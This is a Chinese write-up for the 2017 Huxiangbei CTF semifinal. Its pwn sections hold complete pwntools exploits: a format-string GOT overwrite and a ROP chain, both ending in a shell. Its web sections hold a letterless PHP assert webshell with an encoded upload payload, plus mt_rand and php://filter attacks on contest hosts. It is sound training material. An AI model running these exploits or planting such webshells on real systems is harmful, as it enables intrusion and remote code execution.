MENU

2017湖湘杯复赛writeup

November 27, 2017 • Read: 1263 • CTF

RE100 Re4newer

查壳发现有 UPX,脱掉之后 IDA 分析定位主函数进行逆向,sub_401080

  *(_OWORD *)v4 = xmmword_41D740;
  *(_OWORD *)&v4[4] = xmmword_41D730;
  *(_OWORD *)&v4[8] = xmmword_41D7A0;
  *(_OWORD *)&v4[12] = xmmword_41D760;
  v5 = xmmword_41D7D0;
  v6 = xmmword_41D750;
  v7 = xmmword_41D790;
  v8 = xmmword_41D780;
  v9 = xmmword_41D7C0;
  v10 = xmmword_41D7B0;
  v11 = xmmword_41D770;
  if ( a1 == 44 )
  {
    i = 0;
    do
    {
      if ( (a2[i] ^ 0x22) != v4[i] )
        break;
      ++i;
    }
    while ( i < 44 );
    if ( i == 44 )
      printf_1("success!\n", a3);
    else
      printf_1("wrong~\n", a3);
  }

还是异或,抠出来异或一次好了。

RE200 简单的android

直接用分析工具打开,看到 flag。

re200

RE400pyc分析

XDCTF 原题

def tobin(b):
    ret=''
    for i in [128,64,32,16,8,4,2,1]:
    ret+='1' if b&i else '0'
    return ret
def decode3b(s):
    a=s>>16
    b=(s>>8) & 0xFF
    c=s & 0xff
    sa=tobin(a)
    sb=tobin(b)
    sc=tobin(c)
    return table[int(sa[2:],2)]+table[int(sb[4:]+sa[:2],2)]+table[int(sc[6:]+sb[:4],2)]+table[int(sc[:6],2)]
    
    
>>> a=open('flag.enc','rb')
>>> a=a.read()
>>> s=''
>>> for i in xrange(0, len(a), 3):
...     s+=decode3b(int(a[i:i+3].encode('hex'), 16))
...
>>> s
'yedugr1ofbm2o4epQz8i1op2tpkxft1nf344t000000000000000'
>>> s=''.join(map(lambda c: table[(table.index(c)+63)%64], s))
'xdctfq0neal1n3doPy7h0no1sojwes0me233s"""""""""""""""'
 
 
xdctf{0ne-l1n3d_Py7h0n_1s_@wes0me233}

Misc100热身运动

64 个棋盘格子,每一帧都有不同的头像在一个格子里面,想到六十四进制和 Base64 编码,将头像的格子换成数字,再对应 Base64 编码,最后解密得到 flag。

25,38,49,33,25,55,44,49,29,5,60,49,13,21,61,38,29,22,57,46,30,23,52
ZmxhZ3sxdF8xNV9mdW5ueX0=
flag{1t_15_funny}

Misc150流量分析

WireShark 打开 pcap 直接导出 flag.zip 打开后是 ce.txt。

rgb

是 RGB 值,写脚本解出 flag。

from PIL import Image
import re

x = 887 
y = 111 
im = Image.new('RGB',(x,y))

#rgb1 = [****]
m=0
file = open('ce.txt')

for i in xrange(0,x):
    for j in xrange(0,y):

        #line = rgb1[(3*m):(3*(m+1))]
        m+=1
        rgb = c = file.readline().split(",")
        im.putpixel((i,j),(int(rgb[0]),int(rgb[1]),int(rgb[2])))

im.show()
im.save("flag.png")

flag

Misc200 Encryptor.apk

分析定位到 EncryptImageActivity 类,可以看到加密函数。

misc200

异或加密,在重复操作,就是把 flag 丢进去再加密一次,拉出结果文件。

根据这个将加密后的文件进行解密就可以,还有就是那个 key 是字符 Password 的 md5,例如 d56a23,key 就是 key=[0xd5,0x6a,0x23] 这样分割。

flag

Misc300

原题

pwn200 Pwne

格式化字符串漏洞,泄露栈中存在的 _IO_2_1_stderr_ 地址后计算出 system 地址,并且在下一次输入的时候把 system 地址覆盖到 atoigot 中,之后输入年龄时输入 /bin/sh\x00,则相当于执行了 system("/bin/sh")。要注意的是本地和远程的环境变量不一样,所以一开始本地可以了远程一直不行,所以换了个泄露的地方。

from pwn import *

local=False
elf=ELF('./pwne')

if local:
#    p=process('./pwne',env = {'LD_PRELOAD': libc.path})
    p=process('./pwne')
    libc=elf.libc
else:
    p=remote('114.215.133.230',10080)
    #p=remote('118.190.77.112',10080)
    libc=ELF('./libc.so.6')


p.recvuntil("WANT PLAY[Y/N]")
p.sendline('Y')
p.recvuntil('NAME:\n\n')
p.sendline('%p%28$p')
p.recvuntil('WELCOME \n')
data=p.recvline()
print data
data=int(data[10:20],16)
print hex(data)
libc_base=data-libc.symbols['_IO_2_1_stderr_']
print "libc_base",hex(libc_base)

sys_addr=libc_base+libc.symbols['system']
print "sys_addr",hex(sys_addr)

sys_l=sys_addr&0x0000ffff
sys_h=(sys_addr&0xffff0000)>>16
print hex(sys_l)
print hex(sys_h)
#gdb.attach(p)

p.recvuntil("AGE:\n\n")
p.sendline("10")

atoi_got=0x0804A02C

p.recvuntil("WANT PLAY[Y/N]")
p.sendline('Y')
p.recvuntil('NAME:\n\n')
payload=p32(atoi_got)+p32(atoi_got+2)+"%%%dc"%(sys_l-8)+"%7$hn"+"%%%dc"%(sys_h-sys_l)+"%8$hn"

p.sendline(payload)
p.recvuntil("AGE:\n\n")
p.sendline("/bin/sh\x00")

p.interactive()

pwn200

pwn300 Pwn3

题目实现了一个计算器功能,存在栈溢出。

pwn300

题目是静态编译的,自己构造下 ROP,然后以数字方式传进去覆盖返回地址。覆盖的过程中有 v5v6v7 三个变量的值要注意下,尤其是 v7 是一个指向堆的指针,最后有一个 free 操作,覆盖成随意的值会通不过检查。所以利用 bss 段上的 ResultDivResultSubResultMul 伪造一个堆绕过 free 检查就可以了。

from pwn import *

payload=[0x0806ed0a,0x080ea060,0x080bb406,0x6e69622f,0x080a1dad,0x0806ed0a,0x080ea064,0x080bb406,0x68732f2f,
        0x080a1dad,0x0806ed0a,0x080ea068,0x08054730,0x080a1dad,0x080481c9,0x080ea060,0x0806ed31,0x080ea068,
        0x080ea060,0x0806ed0a,0x080ea068,0x080bb406,0xb,0x08049781]
print len(payload)

#p=process('./pwn300')
p=remote('118.190.83.164',10080)
p.recvuntil('calculate:')
p.sendline('43')

for i in xrange(10):
    p.recvuntil('result')
    p.sendline('1')
    p.recvuntil('x:')
    p.sendline('1')
    p.recvuntil('y:')
    p.sendline('2')
#v6
p.recvuntil('result')
p.sendline('1')
p.recvuntil('x:')
p.sendline('10')
p.recvuntil('y:')
p.sendline('28')
#v7
v7=0x080EBF28
p.recvuntil('result')
p.sendline('1')
p.recvuntil('x:')
p.sendline(str(v7))
p.recvuntil('y:')
p.sendline('0')
#v8
p.recvuntil('result')
p.sendline('1')
p.recvuntil('x:')
p.sendline('1')
p.recvuntil('y:')
p.sendline('12')
#ebp
p.recvuntil('result')
p.sendline('1')
p.recvuntil('x:')
p.sendline(str(payload[0]))
p.recvuntil('y:')
p.sendline('0')

p.recvuntil('result')
p.sendline('1')
p.recvuntil('x:')
p.sendline(str(payload[0]))
p.recvuntil('y:')
p.sendline('0')

p.recvuntil('result')
p.sendline('1')
p.recvuntil('x:')
p.sendline(str(payload[0]))
p.recvuntil('y:')
p.sendline('0')

for i in xrange(24):
    p.recvuntil('result')
    p.sendline('1')
    p.recvuntil('x:')
    print hex(payload[i])
    print str(payload[i])
    p.sendline(str(payload[i]))
    p.recvuntil('y:')
    p.sendline('0')

p.recvuntil('result')
p.sendline('4')
p.recvuntil('x:')
p.sendline('0')
p.recvuntil('y:')
p.sendline('1')

p.recvuntil('result')
p.sendline('2')
p.recvuntil('x:')
p.sendline(str(0x21))
p.recvuntil('y:')
p.sendline('0')

#gdb.attach(p)
p.recvuntil('result')
p.sendline('5')
p.interactive()

img

Web150 random

访问 .index.php.swp 得到源码。

<?php
error_reporting(0);
$flag = "*********************";
echo "please input a rand_num !";
function create_password($pw_length =  10){
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++){
        $randpwd .= chr(mt_rand(100, 200));
    }
    return $randpwd;
}

session_start();

mt_srand(time());

$pwd=create_password();

echo $pwd.'||';    

if($pwd == $_GET['pwd']){
    echo "first";
    if($_SESSION['userLogin']==$_GET['login'])
        echo "Nice , you get the flag it is ".$flag ;
}else{
    echo "Wrong!";
}

$_SESSION['userLogin']=create_password(32).rand();
?>

是按照时间戳那生成的密码,所以快速的再提交一边密码就好了。

#coding=utf-8
import sys
import urllib
reload(sys)
sys.setdefaultencoding("utf-8")
import requests
pwd = requests.get('http://114.215.138.89:10080').content[-18:-8]
print pwd
ans1 =  requests.get('http://114.215.138.89:10080?pwd='+urllib.quote(pwd)).content
print ans1

img

Web200

文件包含漏洞,直接使用 php://filter 读取 flag.php 即可获得 Base64 编码过后的 flag。

img

解码得到 flag。

$flag="flag{c420fb4054e91944a71ff68f7079b9424e5cba21}"; 

Web300

过滤了字母、数字和一些符号,需要上传一个 webshell。

找到 p 牛的文章,提到了一种利用类型转换的 webshell。

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);

根据本题的 waf,还是需要绕过一下,@ 用来屏蔽错误,可以去掉,不影响功能,用来获取 Array 字符串的双引号可以采用 $_=''.[]; 绕过。

最后可以绕过本题 waf 的 webshell。

<?php $_=''.[];$_=$_['_'=='__'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);

编码后即可成功上传webshell。

最终payload。

http://114.215.133.202:10080/index.php?content=%24_%3D%27%27.%5B%5D%3B%24_%3D%24_%5B%27_%27%3D%3D%27__%27%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24___.%3D%24__%3B%24____%3D%27_%27%3B%24__%3D%24_%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24__%2b%2b%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___%28%24_%5B_%5D%29%3B

<?php $flag="=hxb2017{51f759f39ac1f0cd5509b299b1d908f7}"; ?>
Tags: ctf
Archives QR Code
QR Code for this page
Tipping QR Code